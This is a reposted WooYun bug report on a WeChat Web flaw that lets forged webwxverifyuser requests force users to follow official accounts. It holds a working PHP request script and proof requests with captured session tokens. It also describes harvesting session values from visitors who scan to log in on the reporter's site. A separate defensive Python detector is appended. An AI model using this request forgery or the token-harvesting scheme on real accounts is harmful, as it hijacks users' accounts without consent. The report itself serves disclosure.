神刀安全网

WeChat: users can be forced to follow an official account

Brief description:

WeChat allows a user to be forced into following an official account.

Detailed description:

A design flaw in WeChat makes it possible to force a user to follow an official account.

Vulnerability details:

Step one of the test: log in to WeChat Web.

Then forward an official-account "follow" link into that session.

Locate the endpoint https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser

Clicking "add friend" on that link has no visible effect,

but the request is still sent with parameters.

A forced follow works as follows: it is enough to send the parameters below.

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(WeChat user value),"Sid":"(WeChat user value)","Skey":"(WeChat user value)","DeviceID":"(WeChat user value)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(official account encrypted value)","VerifyUserTicket":"(official account encrypted value)"}],"VerifyContent":"我是(username)","SceneListCount":10,"SceneList":[33],"skey":"(user value)"}

All of the (user value) fields can be obtained through WeChat scan-to-login: as soon as you scan to log in to my website, I can make that WeChat account forcibly follow an official account.

The (official account encrypted value) is obtained from this endpoint: https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxsync?sid=(WeChat user value)&skey=(WeChat user value)

Final testing showed that the following also works, with Value set to the official account's plain WeChat ID and VerifyUserTicket left empty: https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300 {"BaseRequest":{"Uin":(WeChat user value),"Sid":"(WeChat user value)","Skey":"(WeChat user value)","DeviceID":"(WeChat user value)"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"(official account's WeChat ID)","VerifyUserTicket":""}],"VerifyContent":"我是(username)","SceneListCount":10,"SceneList":[33],"skey":"(user value)"}

The conditions for a forced follow are: 1. the victim scans to log in on my website; 2. I know the WeChat ID of the official account they should be forced to follow.

To stress once more how the user values are obtained: any website that integrates WeChat scan-to-login receives the user values shown above. This vulnerability does exist.

After one day of testing, I was able to make a single WeChat account forcibly follow roughly 20 official accounts.

<?php
// Request headers captured from the reporter's own WeChat Web session
// (the cookie values are that test session's tokens as posted in the report).
$header = array(
    'Host: wx2.qq.com',
    'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0',
    'Accept: application/json, text/plain, */*',
    'Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
    'Accept-Encoding: gzip, deflate',
    'DNT: 1',
    'Content-Type: application/json;charset=utf-8',
    'Referer: https://wx2.qq.com/',
    'Cookie: wxuin=2330616138; webwxuvid=cab5317930f5335a8994ade9a8160d9a0c1e843e1bd24ff03ab254c91d4ea3a8ec31a98c8d9adb6087cf6e9043d53c58; pgv_pvi=3286183936; pgv_pvid=8255006950; pgv_info=ssid=s2371423939; pgv_si=s1581726720; wxsid=hBgpWPQeDRDVm3Rc; wxloadtime=1444359620_expired; mm_lang=zh_CN; webwx_data_ticket=AQaRtHUZKZBvZZR2FeXCn5pg; MM_WX_NOTIFY_STATE=1; MM_WX_SOUND_STATE=1; wxpluginkey=1444352949',
    'Connection: keep-alive',
);

// JSON body: Value carries the official account's plain WeChat ID and VerifyUserTicket is left empty.
$data = '{"BaseRequest":{"Uin":2330616138,"Sid":"hBgpWPQeDRDVm3Rc","Skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4","DeviceID":"e589828811516427"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"VerifyContent":"我是123456789","SceneListCount":1,"SceneList":[33],"skey":"@crypt_59f3b75a_83ef845caf0ab36ff0030430799256a4"}';

$ch = curl_init("http://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444361009023");
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$b = curl_exec($ch);
curl_close($ch);

The above is PHP code. For the user values inside it, scan to log in to WeChat Web, capture them by hand, put them into the script and run it.

This supplement should be sufficient!!! I have sent you the code; I cannot give you screenshots, a video would be possible, but I can't be bothered to record one.

Proof of vulnerability:

https://wx2.qq.com/cgi-bin/mmwebwx-bin/webwxverifyuser?r=1444191154300

{"BaseRequest":{"Uin":2330616138,"Sid":"Ix4w3k0gAVg1T5SW","Skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296","DeviceID":"e426131629909286"},"Opcode":1,"VerifyUserListSize":1,"VerifyUserList":[{"Value":"@888d1b21d2fe80dafe922ed50723874b","VerifyUserTicket":"v1_92c7ceebbd2a799f06c7e5f97fd352c5c040d63b8c40ec055b6968f5068860d3@stranger"}],"VerifyContent":"我是123456789","SceneListCount":10,"SceneList":[33],"skey":"@crypt_59f3b75a_a777b52ce96a1fa4850c7bad1661c296"}

Fix recommendation:

WeChat has experts for that; I won't speculate.
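As an added, defender-side example that is not part of the original report: a small Python checker that flags webwxverifyuser requests matching the pattern described above (empty VerifyUserTicket, a plain WeChat ID in Value instead of an encrypted handle) and then finds accounts that issue such requests in bursts, as the reporter's roughly 20-per-day test would. The log records, the Uin values 1001/1002, and the assumption that a normal request always carries an "@<32 hex>" handle and a "v1_<hex>@stranger" ticket are constructed from the shape of the report's proof request, not taken from WeChat documentation.

```python
import json
import re
from collections import Counter

# Constructed sample records (not data from the report): one webwxverifyuser POST each,
# with the session Uin and the JSON body as a gateway log might store them.
LEGIT_BODY = ('{"BaseRequest":{"Uin":1001},"Opcode":1,"VerifyUserListSize":1,'
              '"VerifyUserList":[{"Value":"@' + "ab" * 16 + '","VerifyUserTicket":"v1_'
              + "cd" * 16 + '@stranger"}],"SceneList":[33]}')
FORCED_BODY = ('{"BaseRequest":{"Uin":1002},"Opcode":1,"VerifyUserListSize":1,'
               '"VerifyUserList":[{"Value":"gopartygo","VerifyUserTicket":""}],"SceneList":[33]}')
SAMPLE_LOG = [{"uin": 1001, "body": LEGIT_BODY}] + [{"uin": 1002, "body": FORCED_BODY}] * 12

# Shapes observed in the report's legitimate proof request; assumed here to be the only valid forms.
HANDLE_RE = re.compile(r"^@[0-9a-f]{32}$")          # encrypted contact handle
TICKET_RE = re.compile(r"^v1_[0-9a-f]+@stranger$")  # ticket issued when the follow link was opened


def classify(body):
    """Return the reasons a verify request looks like a forced follow; [] means it looks normal."""
    try:
        req = json.loads(body)
    except ValueError:
        return ["malformed-json"]
    reasons = []
    entries = req.get("VerifyUserList") or []
    if req.get("VerifyUserListSize", len(entries)) != len(entries):
        reasons.append("list-size-mismatch")
    for entry in entries:
        if not TICKET_RE.match(entry.get("VerifyUserTicket", "")):
            reasons.append("missing-or-bad-ticket")  # the server should never accept ""
        if not HANDLE_RE.match(entry.get("Value", "")):
            reasons.append("plain-id-value")         # raw WeChat ID instead of an encrypted handle
    return reasons


def flag_log(records):
    """Return (uin, reasons) for every record that classify() does not consider normal."""
    flagged = []
    for rec in records:
        reasons = classify(rec["body"])
        if reasons:
            flagged.append((rec["uin"], reasons))
    return flagged


def bursty_uins(records, threshold=10):
    """Uins with at least `threshold` flagged requests in the log window."""
    counts = Counter(uin for uin, _ in flag_log(records))
    return sorted(uin for uin, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for uin, reasons in flag_log(SAMPLE_LOG)[:3]:
        print(uin, reasons)
    print("bursty:", bursty_uins(SAMPLE_LOG))
```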

Copyright notice: 神刀安全网 reposted this from 莫里@乌云 (WooYun).
